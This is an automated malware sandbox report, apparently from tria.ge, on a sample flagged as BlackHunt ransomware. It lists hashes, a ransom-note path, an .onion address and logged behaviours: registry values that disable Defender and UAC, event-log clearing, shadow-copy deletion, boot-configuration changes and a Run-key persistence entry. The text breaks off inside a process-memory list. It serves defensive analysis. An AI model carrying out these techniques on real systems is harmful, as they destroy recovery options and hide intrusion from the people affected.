Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 23:38
Static task
static1
Behavioral task
behavioral1
Sample
68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe
Resource
win10v2004-20231215-en
General
-
Target
68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe
-
Size
707KB
-
MD5
36249336945a46b4936c389440b2e0eb
-
SHA1
d5d60d279e740cd2c5cfeec940a4cb6b6d35a6fe
-
SHA256
68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b
-
SHA512
19d193ad0edaf19460e56f58c10e6bee317b0e1fc5b220a77e918953e0a5f4416304dd0189a3ca3f523bd92c2577508b06e6c8493eaf164c73c2e15fcb3c9d6f
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1Y8wvnh:6uaTmkZJ+naie5OTamgEoKxLWbuh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 3020 fsutil.exe 4612 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 564 wevtutil.exe 3032 wevtutil.exe 1660 wevtutil.exe 2928 wevtutil.exe 208 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1992 bcdedit.exe 1988 bcdedit.exe 212 bcdedit.exe 3432 bcdedit.exe -
Renames multiple (2876) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 960 wbadmin.exe 3664 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 4508 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\Y: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\I: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Q: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\P: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\S: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\V: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\O: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\Z: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\N: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\R: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\T: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\H: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\L: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\B: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\U: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\A: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\J: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\X: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\M: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\G: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened (read-only) \??\K: 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Google\Update\Install\{F233FC20-BAD7-4319-A416-C4D060784296}\#BlackHunt_ReadMe.hta 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Google\Update\Offline\#BlackHunt_ReadMe.hta 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Galapagos 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\vlc.mo 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationLeft_ButtonGraphic.png 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Hobart 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#BlackHunt_ReadMe.hta 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Malta 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+5 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\106.0.5249.119\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\7-Zip\Lang\be.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\travel.png 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.hta 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cayenne 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Darwin 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tijuana 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#BlackHunt_ReadMe.hta 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\DVD Maker\offset.ax 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\DvdTransform.fx 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\rt.jar 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dili 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_ja.jar 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Palmer 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tegucigalpa 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Reykjavik 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\MANIFEST.MF 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_ja_4.4.0.v20140623020002.jar 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Oral 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationRight_ButtonGraphic.png 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk_1.0.300.v20140407-1803.jar 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\#BlackHunt_Private.key 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\Java\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\specialoccasion.png 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\videowall.png 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Denver 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Palmer 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wake 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground_PAL.wmv 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-previous-static.png 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-foreground.png 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\VideoLAN\VLC\plugins\control\#BlackHunt_ReadMe.hta 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_out\#BlackHunt_ReadMe.txt 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prcr.x3d 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3024 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1384 vssadmin.exe 2700 vssadmin.exe 2616 vssadmin.exe 2012 vssadmin.exe 2724 vssadmin.exe 2892 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 596 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1924 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 3176 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Token: SeRestorePrivilege 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Token: SeBackupPrivilege 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Token: SeTakeOwnershipPrivilege 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Token: SeAuditPrivilege 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Token: SeSecurityPrivilege 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Token: SeIncBasePriorityPrivilege 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Token: SeBackupPrivilege 2984 vssvc.exe Token: SeRestorePrivilege 2984 vssvc.exe Token: SeAuditPrivilege 2984 vssvc.exe Token: SeBackupPrivilege 2032 wbengine.exe Token: SeRestorePrivilege 2032 wbengine.exe Token: SeSecurityPrivilege 2032 wbengine.exe Token: SeSecurityPrivilege 1660 wevtutil.exe Token: SeBackupPrivilege 1660 wevtutil.exe Token: SeSecurityPrivilege 2928 wevtutil.exe Token: SeSecurityPrivilege 3032 wevtutil.exe Token: SeBackupPrivilege 2928 wevtutil.exe Token: SeBackupPrivilege 3032 wevtutil.exe Token: SeSecurityPrivilege 208 wevtutil.exe Token: SeBackupPrivilege 208 wevtutil.exe Token: SeSecurityPrivilege 564 wevtutil.exe Token: SeBackupPrivilege 564 wevtutil.exe Token: SeDebugPrivilege 596 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2768 wrote to memory of 2812 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 29 PID 2768 wrote to memory of 2812 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 29 PID 2768 wrote to memory of 2812 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 29 PID 2768 wrote to memory of 2812 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 29 PID 2768 wrote to memory of 2744 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 31 PID 2768 wrote to memory of 2744 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 31 PID 2768 wrote to memory of 2744 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 31 PID 2768 wrote to memory of 2744 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 31 PID 2768 wrote to memory of 2712 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 33 PID 2768 wrote to memory of 2712 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 33 PID 2768 wrote to memory of 2712 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 33 PID 2768 wrote to memory of 2712 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 33 PID 2812 wrote to memory of 2860 2812 cmd.exe 35 PID 2812 wrote to memory of 2860 2812 cmd.exe 35 PID 2812 wrote to memory of 2860 2812 cmd.exe 35 PID 2768 wrote to memory of 2852 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 36 PID 2768 wrote to memory of 2852 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 36 PID 2768 wrote to memory of 2852 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 36 PID 2768 wrote to memory of 2852 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 36 PID 2744 wrote to memory of 2748 2744 cmd.exe 38 PID 2744 wrote to memory of 2748 2744 cmd.exe 38 PID 2744 wrote to memory of 2748 2744 cmd.exe 38 PID 2768 wrote to memory of 2620 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 41 PID 2768 wrote to memory of 2620 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 41 PID 2768 wrote to memory of 2620 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 41 PID 2768 wrote to memory of 2620 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 41 PID 2768 wrote to memory of 1964 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 39 PID 2768 wrote to memory of 1964 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 39 PID 2768 wrote to memory of 1964 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 39 PID 2768 wrote to memory of 1964 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 39 PID 2768 wrote to memory of 2408 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 42 PID 2768 wrote to memory of 2408 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 42 PID 2768 wrote to memory of 2408 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 42 PID 2768 wrote to memory of 2408 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 42 PID 2712 wrote to memory of 2760 2712 cmd.exe 44 PID 2712 wrote to memory of 2760 2712 cmd.exe 44 PID 2712 wrote to memory of 2760 2712 cmd.exe 44 PID 2768 wrote to memory of 2168 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 45 PID 2768 wrote to memory of 2168 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 45 PID 2768 wrote to memory of 2168 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 45 PID 2768 wrote to memory of 2168 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 45 PID 2768 wrote to memory of 2632 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 48 PID 2768 wrote to memory of 2632 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 48 PID 2768 wrote to memory of 2632 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 48 PID 2768 wrote to memory of 2632 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 48 PID 2768 wrote to memory of 2708 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 50 PID 2768 wrote to memory of 2708 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 50 PID 2768 wrote to memory of 2708 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 50 PID 2768 wrote to memory of 2708 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 50 PID 2852 wrote to memory of 624 2852 cmd.exe 52 PID 2852 wrote to memory of 624 2852 cmd.exe 52 PID 2852 wrote to memory of 624 2852 cmd.exe 52 PID 2768 wrote to memory of 2636 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 53 PID 2768 wrote to memory of 2636 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 53 PID 2768 wrote to memory of 2636 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 53 PID 2768 wrote to memory of 2636 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 53 PID 2768 wrote to memory of 2372 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 54 PID 2768 wrote to memory of 2372 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 54 PID 2768 wrote to memory of 2372 2768 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 54 PID 2768 wrote to memory of 2372 2768 